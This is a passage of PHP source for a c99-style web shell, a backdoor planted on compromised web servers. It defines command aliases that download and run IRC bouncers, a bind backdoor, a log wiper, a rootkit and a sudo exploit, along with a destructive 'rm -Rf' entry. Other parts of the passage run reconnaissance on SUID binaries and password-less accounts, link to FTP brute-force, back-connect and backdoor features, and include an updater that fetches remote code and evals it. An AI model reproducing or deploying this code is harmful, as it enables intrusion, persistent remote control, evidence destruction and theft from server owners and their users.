  438.     array("wget & extract psyBNC","wget ".$sh_mainurl."psy.tar.gz;tar -zxf psy.tar.gz;cd .psy;./config 2020;./fuck;perl psy;./run"),
  439.     array("wget & extract EggDrop","wget ".$sh_mainurl."httpd.tar.gz;tar -zxf httpd.tar.gz"),
  440.     array("-----",""),
  441.     array("Logged in users","w"),
  442.     array("Last to connect","lastlog"),
  443.     array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
  444.     array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
  445.     array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
  446.     array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
  447.     array("CPU Info","cat /proc/version /proc/cpuinfo"),
  448.     array("Is gcc installed ?","locate gcc"),
  449.     array("Format box (DANGEROUS)","rm -Rf"),
  450.     array("-----",""),
  451.     array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
  452.     array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
  453.     array("Run WIPELOGS PT3","./zap2"),
  454.     array("-----",""),
  455.     array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
  456.    array("wget & run BindDoor","wget ".$sh_mainurl."tool/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"),
  457.     array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
  458.   );
  459. }
  460. else {
  461.   $cmdaliases = array(
  462.     array("", "dir"),
  463.     array("Find index.php in current dir", "dir /s /w /b index.php"),
  464.     array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
  465.     array("Find c99shell in current dir", "find /c \"c99\" *"),
  466.     array("Find r57shell in current dir", "find /c \"r57\" *"),
  467.     array("Show active connections", "netstat -an"),
  468.     array("Show running services", "net start"),
  469.     array("User accounts", "net user"),
  470.     array("Show computers", "net view"),
  471.     );
  472. }
  473. //PHP Filesystem Functions, s4l1ty_
  474. $phpfsaliases = array(
  475.     array("Read File", "read"),
  476.     array("Write File (PHP5)", "write"),
  477.     array("Copy", "copy"),
  478.     array("Rename/Move", "rename"),
  479.     array("Delete", "delete"),
  480.     array("Make Dir","mkdir"),
  481.     array("-----", ""),
  482.     array("Download", "download"),
  483.     array("Download (Binary Safe)", "downloadbin"),
  484.     array("Change Perm (0755)", "chmod"),
  485.     array("Find Writable Dir", "fwritabledir"),
  486.     array("Find Pathname Pattern", "glob"),
  487. );
  488.  
  489. //Quick launch
  490. $quicklaunch1 = array(
  491.     array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
  492.     array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
  493.     array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
  494.     array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
  495.    array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
  496.    array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
  497. );
  498. $quicklaunch2 = array(
  499.     array("Enumerate",$enumerate),
  500.     array("Security Info",$surl."act=security&d=%d"),
  501.    array("Processes",$surl."act=processes&d=%d"),
  502.    array("MySQL",$surl."act=sql&d=%d"),
  503.    array("PHP-Code",$surl."act=eval&d=%d"),
  504.    array("Encoder",$surl."act=encoder&d=%d"),
  505.    array("Mailer",$surl."act=yxmailer"),
  506.    array("milw0rm it!",$millink),
  507.    array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
  508.    array("Word-Lists","http://darkc0de.com/wordlists/"),
  509.    array("Toolz",$surl."act=tools&d=%d"),
  510.    array("Self-Kill",$surl."act=selfremove"),
  511.    array("Feedback",$surl."act=feedback"),
  512.    array("Update",$surl."act=update"),
  513.    array("About",$surl."act=about")
  514. );
  515.  
  516. if (!$win) {
  517. $quicklaunch2[] = array("<br>FTP-Brute",$surl."act=ftpquickbrute&d=%d");
  518. $quicklaunch2[] = array("Backdoor",$surl."act=shbd");
  519. $quicklaunch2[] = array("Back-Connect",$surl."act=backc");
  520. }
  521.  
  522. //Highlight-code colors
  523. $highlight_background = "#C0C0C0";
  524. $highlight_bg = "#FFFFFF";
  525. $highlight_comment = "#6A6A6A";
  526. $highlight_default = "#0000BB";
  527. $highlight_html = "#1300FF";
  528. $highlight_keyword = "#007700";
  529. $highlight_string = "#000000";
  530.  
  531. @$f = $_REQUEST["f"];
  532. @extract($_REQUEST["c99shcook"]);
  533. //END OF CONFIGURATIONS
  534.  
  535. //STOP EDITING!
  536.  
  537. //Authentication
  538. @set_time_limit(0);
  539. $tmp = array();
  540. foreach ($host_allow as $k=>$v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); }
  541. $s = "!^(".implode("|",$tmp).")$!i";
  542. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
  543.   exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
  544. }
  545. if (!empty($login)) {
  546.   if (empty($md5_pass)) {$md5_pass = md5($pass);}
  547.   if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
  548.     header("WWW-Authenticate: Basic realm=\"".$sh_name.": ".$login_txt."\"");
  549.     header("HTTP/1.0 401 Unauthorized");
  550.     exit($accessdeniedmess);
  551.   }
  552. }
  553. if ($act != "img") {
  554.   $lastdir = realpath(".");
  555.   chdir($curdir);
  556.   if ($selfwrite or $updatenow) {
  557.     @ob_clean();
  558.     c99sh_getupdate($selfwrite,1);
  559.     exit;
  560.   }
  561.   $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  562.   if (!is_array($sess_data)) {$sess_data = array();}
  563.   if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  564.   if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  565.   if (!function_exists("c99getsource")) {
  566.     function c99getsource($fn) {
  567.       global $c99sh_sourcesurl;
  568.       $array = array(
  569.         "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
  570.         "c99sh_bindport.c" => "c99sh_bindport_c.txt",
  571.         "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
  572.         "c99sh_backconn.c" => "c99sh_backconn_c.txt",
  573.         "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
  574.         "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
  575.       );
  576.       $name = $array[$fn];
  577.       if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
  578.       else {return FALSE;}
  579.     }
  580.   }
  581.   if (!function_exists("c99sh_getupdate")) {
  582.     function c99sh_getupdate($update = TRUE) {
  583.       $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0");
  584.       $data = @file_get_contents($url);
  585.       if (!$data) {return "Can't connect to update-server!";}
  586.       else {
  587.         $data = ltrim($data);
  588.         $string = substr($data,3,ord($data{2}));
  589.         if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
  590.         if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
  591.         if ($data{0} == "\x99" and $data{1} == "\x03") {
  592.           $string = explode("|",$string);
  593.           if ($update) {
  594.             $confvars = array();
  595.             $sourceurl = $string[0];
  596.             $source = file_get_contents($sourceurl);
  597.             if (!$source) {return "Can't fetch update!";}
  598.             else {
  599.               $fp = fopen(__FILE__,"w");
  600.               if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download yx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
  601.               else {
  602.                 fwrite($fp,$source);
  603.                 fclose($fp);
  604.                 return "Thanks! Update completed.";
  605.               }
  606.             }
  607.           }
  608.           else {return "New version are available: ".$string[1];}
  609.         }
  610.         elseif ($data{0} == "\x99" and $data{1} == "\x04") {
  611.           eval($string);
  612.           return 1;
  613.         }
  614.         else {return "Error in protocol: segmentation failed! (".$data.") ";}
  615.       }
  616.     }
  617.   }
  618.   if (!function_exists("c99_buff_prepare")) {
  619.     function c99_buff_prepare() {
  620.       global $sess_data;
  621.       global $act;
  622.       foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  623.       foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  624.       $sess_data["copy"] = array_unique($sess_data["copy"]);
  625.       $sess_data["cut"] = array_unique($sess_data["cut"]);
  626.       sort($sess_data["copy"]);
  627.       sort($sess_data["cut"]);
  628.       if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  629.       else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  630.     }
  631.   }
  632.   c99_buff_prepare();
  633.   if (!function_exists("c99_sess_put")) {
  634.     function c99_sess_put($data) {
  635.       global $sess_cookie;
  636.       global $sess_data;
  637.       c99_buff_prepare();
  638.       $sess_data = $data;
  639.       $data = serialize($data);
  640.       setcookie($sess_cookie,$data);
  641.     }
  642.   }
  643.   foreach (array("sort","sql_sort") as $v) {
  644.     if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  645.     if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  646.   }
  647.   if ($sort_save) {
  648.     if (!empty($sort)) {setcookie("sort",$sort);}
  649.     if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  650.   }
  651.   if (!function_exists("str2mini")) {
  652.     function str2mini($content,$len) {
  653.       if (strlen($content) > $len) {
  654.         $len = ceil($len/2) - 2;
  655.         return substr($content, 0,$len)."...".substr($content,-$len);
  656.       } else {return $content;}
  657.     }
  658.   }
  659.   if (!function_exists("view_size")) {
  660.     function view_size($size) {
  661.       if (!is_numeric($size)) { return FALSE; }
  662.       else {
  663.         if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  664.         elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  665.         elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  666.         else {$size = $size . " B";}
  667.         return $size;
  668.       }
  669.     }
  670.   }
  671.   if (!function_exists("fs_copy_dir")) {
  672.     function fs_copy_dir($d,$t) {
  673.       $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  674.       if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  675.       $h = opendir($d);
  676.       while (($o = readdir($h)) !== FALSE) {
  677.         if (($o != ".") and ($o != "..")) {
  678.           if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  679.           else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  680.           if (!$ret) {return $ret;}
  681.         }
  682.       }
  683.       closedir($h);
  684.       return TRUE;
  685.     }
  686.   }
  687.   if (!function_exists("fs_copy_obj")) {
  688.     function fs_copy_obj($d,$t) {
  689.       $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  690.       $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  691.       if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  692.       if (is_dir($d)) {
  693.         if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  694.         if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  695.         return fs_copy_dir($d,$t);
  696.       }
  697.       elseif (is_file($d)) { return copy($d,$t); }
  698.       else { return FALSE; }
  699.     }
  700.   }
  701.   if (!function_exists("fs_move_dir")) {
  702.     function fs_move_dir($d,$t) {
  703.       $h = opendir($d);
  704.       if (!is_dir($t)) {mkdir($t);}
  705.       while (($o = readdir($h)) !== FALSE) {
  706.         if (($o != ".") and ($o != "..")) {
  707.           $ret = TRUE;
  708.           if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  709.           else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  710.           if (!$ret) {return $ret;}
  711.         }
  712.       }
  713.       closedir($h);
  714.       return TRUE;
  715.     }
  716.   }
  717.   if (!function_exists("fs_move_obj")) {
  718.     function fs_move_obj($d,$t) {
  719.       $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  720.       $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  721.       if (is_dir($d)) {
  722.         if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  723.         if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  724.         return fs_move_dir($d,$t);
  725.       }
  726.       elseif (is_file($d)) {
  727.         if(copy($d,$t)) {return unlink($d);}
  728.         else {unlink($t); return FALSE;}
  729.       }
  730.       else {return FALSE;}
  731.     }
  732.   }
  733.   if (!function_exists("fs_rmdir")) {
  734.     function fs_rmdir($d) {
  735.       $h = opendir($d);
  736.       while (($o = readdir($h)) !== FALSE) {
  737.         if (($o != ".") and ($o != "..")) {
  738.           if (!is_dir($d.$o)) {unlink($d.$o);}
  739.           else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  740.         }
  741.       }
  742.       closedir($h);
  743.       rmdir($d);
  744.       return !is_dir($d);
  745.     }
  746.   }
  747.   if (!function_exists("fs_rmobj")) {
  748.     function fs_rmobj($o) {
  749.       $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  750.       if (is_dir($o)) {
  751.         if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  752.         return fs_rmdir($o);
  753.       }
  754.       elseif (is_file($o)) {return unlink($o);}
  755.       else {return FALSE;}
  756.     }
  757.   }
  758.   if (!function_exists("tabsort")) {
  759.     function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}
  760.   }
  761.   if (!function_exists("view_perms")) {
  762.     function view_perms($mode) {
  763.       if (($mode & 0xC000) === 0xC000) {$type = "s";}
  764.       elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  765.       elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  766.       elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  767.       elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  768.       elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  769.       elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  770.       else {$type = "?";}
  771.       $owner["read"] = ($mode & 00400)?"r":"-";
  772.       $owner["write"] = ($mode & 00200)?"w":"-";
  773.       $owner["execute"] = ($mode & 00100)?"x":"-";
  774.       $group["read"] = ($mode & 00040)?"r":"-";
  775.       $group["write"] = ($mode & 00020)?"w":"-";
  776.       $group["execute"] = ($mode & 00010)?"x":"-";
  777.       $world["read"] = ($mode & 00004)?"r":"-";
  778.       $world["write"] = ($mode & 00002)? "w":"-";
  779.       $world["execute"] = ($mode & 00001)?"x":"-";
  780.       if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  781.       if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  782.       if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  783.       return $type.join("",$owner).join("",$group).join("",$world);
  784.     }
  785.   }
  786.   if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
  787.   if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
  788.   if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
  789.   if (!function_exists("parse_perms")) {
  790.     function parse_perms($mode) {
  791.       if (($mode & 0xC000) === 0xC000) {$t = "s";}
  792.       elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  793.       elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  794.       elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  795.       elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  796.       elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  797.       elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  798.       else {$t = "?";}
  799.       $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  800.       $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  801.       $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  802.       return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  803.     }
  804.   }
  805.   if (!function_exists("parsesort")) {
  806.     function parsesort($sort) {
  807.       $one = intval($sort);
  808.       $second = substr($sort,-1);
  809.       if ($second != "d") {$second = "a";}
  810.       return array($one,$second);
  811.     }
  812.   }
  813.   if (!function_exists("view_perms_color")) {
  814.     function view_perms_color($o) {
  815.       if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  816.       elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  817.       else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  818.     }
  819.   }
  820.   if (!function_exists("mysql_dump")) {
  821.     function mysql_dump($set) {
  822.       global $sh_ver;
  823.       $sock = $set["sock"];
  824.       $db = $set["db"];
  825.       $print = $set["print"];
  826.       $nl2br = $set["nl2br"];
  827.       $file = $set["file"];
  828.       $add_drop = $set["add_drop"];
  829.       $tabs = $set["tabs"];
  830.       $onlytabs = $set["onlytabs"];
  831.       $ret = array();
  832.       $ret["err"] = array();
  833.       if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  834.       if (empty($db)) {$db = "db";}
  835.       if (empty($print)) {$print = 0;}
  836.       if (empty($nl2br)) {$nl2br = 0;}
  837.       if (empty($add_drop)) {$add_drop = TRUE;}
  838.       if (empty($file)) {
  839.         $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  840.       }
  841.       if (!is_array($tabs)) {$tabs = array();}
  842.       if (empty($add_drop)) {$add_drop = TRUE;}
  843.       if (sizeof($tabs) == 0) {
  844.         //Retrieve tables-list
  845.         $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  846.         if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  847.       }
  848.       $out = "
  849.       # Dumped by ".$sh_name."
  850.       #
  851.       # Host settings:
  852.       # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  853.       # Date: ".date("d.m.Y H:i:s")."
  854.       # DB: \"".$db."\"
  855.       #---------------------------------------------------------";
  856.       $c = count($onlytabs);
  857.       foreach($tabs as $tab) {
  858.         if ((in_array($tab,$onlytabs)) or (!$c)) {
  859.           if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  860.           //Receieve query for create table structure
  861.           $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  862.           if (!$res) {$ret["err"][] = mysql_smarterror();}
  863.           else {
  864.             $row = mysql_fetch_row($res);
  865.             $out .= $row["1"].";\n\n";
  866.             //Receieve table variables
  867.             $res = mysql_query("SELECT * FROM `$tab`", $sock);
  868.             if (mysql_num_rows($res) > 0) {
  869.               while ($row = mysql_fetch_assoc($res)) {
  870.                 $keys = implode("`, `", array_keys($row));
  871.                 $values = array_values($row);
  872.                 foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  873.                 $values = implode("', '", $values);
  874.                 $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  875.                 $out .= $sql;
  876.               }
  877.             }
  878.           }
  879.         }
  880.       }
  881.       $out .= "#---------------------------------------------------------------------------------\n\n";
  882.       if ($file) {
  883.         $fp = fopen($file, "w");
  884.         if (!$fp) {$ret["err"][] = 2;}
  885.         else {
  886.           fwrite ($fp, $out);
  887.           fclose ($fp);
  888.         }
  889.       }
  890.       if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  891.       return $out;
  892.     }
  893.   }
  894.   if (!function_exists("mysql_buildwhere")) {
  895.     function mysql_buildwhere($array,$sep=" and",$functs=array()) {
  896.       if (!is_array($array)) {$array = array();}
  897.       $result = "";
  898.       foreach($array as $k=>$v) {
  899.         $value = "";
  900.         if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  901.         $value .= "'".addslashes($v)."'";
  902.         if (!empty($functs[$k])) {$value .= ")";}
  903.         $result .= "`".$k."` = ".$value.$sep;
  904.       }
  905.       $result = substr($result,0,strlen($result)-strlen($sep));
  906.       return $result;
  907.     }
  908.   }
  909.   if (!function_exists("mysql_fetch_all")) {
  910.     function mysql_fetch_all($query,$sock) {
  911.       if ($sock) {$result = mysql_query($query,$sock);}
  912.       else {$result = mysql_query($query);}
  913.       $array = array();
  914.       while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  915.       mysql_free_result($result);
  916.       return $array;
  917.     }
  918.   }
  919.   if (!function_exists("mysql_smarterror")) {
  920.     function mysql_smarterror($type,$sock) {
  921.       if ($sock) {$error = mysql_error($sock);}
  922.       else {$error = mysql_error();}
  923.       $error = htmlspecialchars($error);
  924.       return $error;
  925.     }
  926.   }
  927.   if (!function_exists("mysql_query_form")) {
  928.     function mysql_query_form() {
  929.       global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  930.       if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  931.       if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  932.       if ((!$submit) or ($sql_act)) {
  933.         echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
  934.         if ($tbl_struct) {
  935.           echo "<td valign=\"top\"><b>Fields:</b><br>";
  936.           foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
  937.           echo "</td></tr></table>";
  938.         }
  939.       }
  940.       if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  941.     }
  942.   }
  943.   if (!function_exists("mysql_create_db")) {
  944.     function mysql_create_db($db,$sock="") {
  945.       $sql = "CREATE DATABASE `".addslashes($db)."`;";
  946.       if ($sock) {return mysql_query($sql,$sock);}
  947.       else {return mysql_query($sql);}
  948.     }
  949.   }
  950.   if (!function_exists("mysql_query_parse")) {
  951.     function mysql_query_parse($query) {
  952.       $query = trim($query);
  953.       $arr = explode (" ",$query);
  954.       $types = array(
  955.         "SELECT"=>array(3,1),
  956.         "SHOW"=>array(2,1),
  957.         "DELETE"=>array(1),
  958.         "DROP"=>array(1)
  959.       );
  960.       $result = array();
  961.       $op = strtoupper($arr[0]);
  962.       if (is_array($types[$op])) {
  963.         $result["propertions"] = $types[$op];
  964.         $result["query"]  = $query;
  965.         if ($types[$op] == 2) {
  966.           foreach($arr as $k=>$v) {
  967.             if (strtoupper($v) == "LIMIT") {
  968.               $result["limit"] = $arr[$k+1];
  969.               $result["limit"] = explode(",",$result["limit"]);
  970.               if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  971.               unset($arr[$k],$arr[$k+1]);
  972.             }
  973.           }
  974.         }
  975.       }
  976.       else {return FALSE;}
  977.     }
  978.   }
  979.   if (!function_exists("c99fsearch")) {
  980.     function c99fsearch($d) {
  981.       global $found;
  982.       global $found_d;
  983.       global $found_f;
  984.       global $search_i_f;
  985.       global $search_i_d;
  986.       global $a;
  987.       if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  988.       $h = opendir($d);
  989.       while (($f = readdir($h)) !== FALSE) {
  990.         if($f != "." && $f != "..") {
  991.          $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  992.           if (is_dir($d.$f)) {
  993.             $search_i_d++;
  994.             if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  995.             if (!is_link($d.$f)) {c99fsearch($d.$f);}
  996.           }
  997.           else {
  998.             $search_i_f++;
  999.             if ($bool) {
  1000.               if (!empty($a["text"])) {
  1001.                 $r = @file_get_contents($d.$f);
  1002.                 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  1003.                 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  1004.                 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  1005.                 else {$bool = strpos(" ".$r,$a["text"],1);}
  1006.                 if ($a["text_not"]) {$bool = !$bool;}
  1007.                 if ($bool) {$found[] = $d.$f; $found_f++;}
  1008.               }
  1009.               else {$found[] = $d.$f; $found_f++;}
  1010.             }
  1011.           }
  1012.         }
  1013.       }
  1014.       closedir($h);
  1015.     }
  1016.   }
  1017.   if ($act == "gofile") {
  1018.     if (is_dir($f)) { $act = "ls"; $d = $f; }
  1019.     else { $act = "f"; $d = dirname($f); $f = basename($f); }
  1020.   }
  1021.   //Sending Headers
  1022.   @ob_start();
  1023.   @ob_implicit_flush(0);
  1024.   function onphpshutdown() {
  1025.     global $gzipencode,$ft;
  1026.     if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
  1027.       $v = @ob_get_contents();
  1028.       @ob_end_clean();
  1029.       @ob_start("ob_gzHandler");
  1030.       echo $v;
  1031.       @ob_end_flush();
  1032.     }
  1033.   }
  1034.   function c99shexit() {
  1035.     onphpshutdown();
  1036.     exit;
  1037.   }
  1038.   header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  1039.   header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  1040.   header("Cache-Control: no-store, no-cache, must-revalidate");
  1041.   header("Cache-Control: post-check=0, pre-check=0", FALSE);
  1042.   header("Pragma: no-cache");
  1043.   //Setting Temporary Dir
  1044.   if (empty($tmpdir)) {
  1045.     $tmpdir = ini_get("upload_tmp_dir");
  1046.     if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  1047.   }
  1048.   $tmpdir = realpath($tmpdir);
  1049.   $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  1050.   if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  1051.   if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  1052.   else {$tmpdir_logs = realpath($tmpdir_logs);}
  1053.   //Getting Status
  1054.   function showstat($stat) {
  1055.     if ($stat=="on") { return "<font color=#00FF00><b>ON</b></font>"; }
  1056.     else { return "<font color=#FF9900><b>OFF</b></font>"; }
  1057.   }
  1058.   function testperl() {
  1059.     if (ex('perl -h')) { return showstat("on"); }
  1060.     else { return showstat("off"); }
  1061.   }
  1062.   function testfetch() {
  1063.     if(ex('fetch --help')) { return showstat("on"); }
  1064.     else { return showstat("off"); }
  1065.   }
  1066.   function testwget() {
  1067.     if (ex('wget --help')) { return showstat("on"); }
  1068.     else { return showstat("off"); }
  1069.   }
  1070.   function testoracle() {
  1071.     if (function_exists('ocilogon')) { return showstat("on"); }
  1072.     else { return showstat("off"); }
  1073.   }
  1074.   function testpostgresql() {
  1075.     if (function_exists('pg_connect')) { return showstat("on"); }
  1076.     else { return showstat("off"); }
  1077.   }
  1078.   function testmssql() {
  1079.     if (function_exists('mssql_connect')) { return showstat("on"); }
  1080.     else { return showstat("off"); }
  1081.   }
  1082.   function testcurl() {
  1083.     if (function_exists('curl_version')) { return showstat("on"); }
  1084.     else { return showstat("off"); }
  1085.   }
  1086.   function testmysql() {
  1087.     if (function_exists('mysql_connect')) { return showstat("on"); }
  1088.     else { return showstat("off"); }
  1089.   }
  1090.   function showdisablefunctions() {
